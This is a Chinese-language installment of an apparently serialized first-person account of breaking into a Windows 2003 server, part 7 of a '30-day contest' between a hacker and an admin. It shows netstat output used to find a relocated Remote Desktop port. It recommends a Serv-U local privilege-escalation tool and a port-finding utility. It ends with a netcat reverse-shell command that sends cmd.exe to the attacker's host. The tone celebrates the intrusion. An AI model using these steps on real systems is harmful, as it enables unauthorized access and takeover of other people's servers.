黑客与网管的30天较量

核心提示： 命令成功完成，hohoho,注意到倒数第8条了吗？TMD开了终端，黑客与网管的30天较量(7)，竟把端口改了，再输入命令，小样还是win2003系统，hhoo.马上提升权限，netstat -anActive ConnectionsProtoLocal AddressForeign Add

命令成功完成。

hohoho,注意到倒数第8条了吗？TMD开了终端，竟把端口改了，再输入命令。

netstat -an

Active Connections
　Proto　Local Address　　　　　Foreign Address　　　　State
　TCP　　0.0.0.0:21　　　　　　0.0.0.0:0　　　　　　　LISTENING
　TCP　　0.0.0.0:80　　　　　　0.0.0.0:0　　　　　　　LISTENING
.......
　TCP　　0.0.0.0:3247　　　　　0.0.0.0:0　　　　　　　LISTENING
　TCP　　127.0.0.1:3721　　　　0.0.0.0:0　　　　　　　LISTENING
　TCP　　127.0.0.1:1433　　　　0.0.0.0:0　　　　　　　LISTENING
　TCP　　127.0.0.1:43958　　　　0.0.0.0:0　　　　　　　LISTENING
.......
　TCP　　xxx.xxx.xxx.xxx:21　　219.137.65.165:1916　　ESTABLISHED
　TCP　　xxx.xxx.xxx.xxx:80　　61.49.255.129:4047　　ESTABLISHED
　TCP　　xxx.xxx.xxx.xxx:80　　61.145.209.148:2277　　ESTABLISHED
　TCP　　xxx.xxx.xxx.xxx:80　　61.149.12.214:14816　　ESTABLISHED

***************************

(以下省略)

(小刀评论:如果有执行权限的话,建议用c3389.exe这个小程序,直接显示出终端服务的端口,要不就netstat -an -p tcp)

尝试了一下几个端口连接，最后确定，3721是真正的终端端口，小样还是win2003系统。hhoo.

马上提升权限，问小刀借了个serv-u5.2版本以下的Serv-U本地权限提升程序和一个nc.exe

(小刀评论:对Serv-u6.0也通用)

先反弹回来一个shell，在对方系统上输入d:wwwwwwrootnc.exe -e cmd.exe xxx.xxx.xxx.xxx 4321